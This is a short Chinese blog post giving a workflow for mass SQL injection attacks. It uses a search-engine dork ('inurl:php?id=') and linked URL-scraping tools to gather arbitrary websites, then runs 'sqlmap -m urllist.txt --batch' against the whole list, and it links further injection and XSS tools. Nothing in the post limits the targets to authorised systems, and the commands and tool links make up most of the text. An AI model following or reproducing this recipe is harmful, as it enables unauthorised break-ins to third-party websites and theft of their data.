python3编写的sql批量注入攻击-泓源视野

python3编写的sql批量注入攻击

首先通过搜索引擎扫描抓关键词 inurl:php?id=
https://github.com/lvwuwei/sql_scan_urllist
url_scrapy.ipynb

superl-url 关键词URL采集
https://github.com/super-l/superl-url

sqlmap -m urllist.txt -–batch当前目录的list
sqlmap -m /root/sql_scan_urllist/urllist.txt -–batch

其次抓取的地址复制保存到urllist.txt集体测试
https://github.com/lvwuwei/sql_scan_urllist
sql_scan_urllist.py

windows版sql注入
https://github.com/lvwuwei/SuperSQLInjectionV1
编译得到 超级sql注入

https://github.com/s0md3v/XSStrike/ 注入
使用说明查看
https://github.com/s0md3v/XSStrike/wiki/Usage
python3编写的sql批量注入攻击插图

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。
13

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8237283 位访客, 您的IP是:[54.198.200.128]